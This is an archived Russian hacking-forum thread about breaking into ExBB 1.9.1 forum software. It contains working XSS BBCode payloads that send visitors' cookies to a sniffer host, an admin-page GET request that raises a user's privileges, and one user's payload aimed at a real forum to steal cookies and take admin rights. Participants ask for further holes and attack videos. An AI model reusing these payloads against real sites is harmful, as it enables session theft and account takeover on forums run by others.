PDA

Просмотр полной версии : Xss в exbb 1.9.1


zFailure
19.10.2004, 00:53
Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg

XSS в каждом теге
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
[size='z="]"style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
[url]'z="style='background:url(javascript:document .images[0].src=/http:@@localhost@1.php?/.source.replace(/@/g,String.fromCharCode(47))+document.cookie)'[/url]
[url="]"style='background:url(javascript:document. images[0].src="http://localhost/1.php?"+document.cookie)'[/url]
[img]http://"z='[/img]'style='background:url(javascript:document.ima ges[0].src="http://localhost/1.php?"+document.cookie)'
[img]"onerror="document.images[0].src='http://localhost/1.php'+String.fromCharCode(63)+document.cookie[/img][/QUOTE]<span id='postcolor'>

кроме xss есть еще одна бага
форма редактирования пользователей из админки передается методом GET
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://localhost/exbb/setmembers.php?action=edit_user&amp;checkaction=yes&amp;us erid=3&amp;membertitle=&amp;emailaddress=lol@lol.ru&amp;newnam e=lol&amp;password=&amp;homepage=&amp;aolname=&amp;icqnumber=&amp;loca tion=&amp;interests=&amp;signature=&amp;numberofposts=0&amp;avatar =noavatar.gif&amp;membercode=ad&amp;submit=%CE%F2%EF%F0%E0 %E2%E8%F2%FC[/QUOTE]<span id='postcolor'>
userid=3 - id пользователя для поднятия прав
newname=ваше имя

http://video.antichat.ru/videos/zfailure/exbb_191.rar

OwrLam
19.10.2004, 18:48
Всё хорошо, но это не то. Мне нужна возможность залития файлов на сервер через админку или другой любой способ. А XBB стандартно - &quot;&gt;

zFailure
19.10.2004, 21:03
ну извени!
там на столько бедная админка, что хрен там было! &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif

ViPN
06.01.2005, 19:18
zFailure
Не мог бы сказать этот баг уже прикрыли?
а то отсылаю вот этот код "style='background:url(javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?video___"+document.cookie)'
"style='background:url(javascript:document.images[0].src="http://forum.k*****h.com/setmembers.php?action=edit_user&checkaction=yes&userid=45&membertitle=&emailaddress=666z@list.ru&newname=Коля&password=111111&homepage=&aolname=&icqnumber=&location=&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")' а там тишина и пустота

ViPN
31.01.2005, 16:28
кто нить может ответить на вопрос есть лиш ещё какие нить баги или дырки или хоть какие нить ещё зацепки на взлом форума Powered by ExBB 1.9.1 или все он стал самым надежным и без бажным форумоммМММ!!!!!

Егорыч+++
31.01.2005, 17:03
У нас видео есть про этот форум

Menvix
06.02.2005, 20:14
Кликнул по ссылке

Kihamo
19.02.2005, 22:11
Кста во я тут кое-что заметил по поводу ExBB 1.9.1. В просмотре топа мона добавлять имя юзера кликнув по линку <a href="javascript:pasteN<a href="javascript:pasteN('UserName')"><b>UserName</b></a>, мона зарегистрировать например такой ник ');alert(document.cookie+' и при клике будет алерт с куками, несмотря на то, что ' заменяются на & #39; дык вот чуствую это как-то мона обыграть, но пока не знаю как :(

smag
25.03.2005, 12:03
У нас видео есть про этот форум
дайте пожайлуста видео!!!! чем больше тем лутше!!!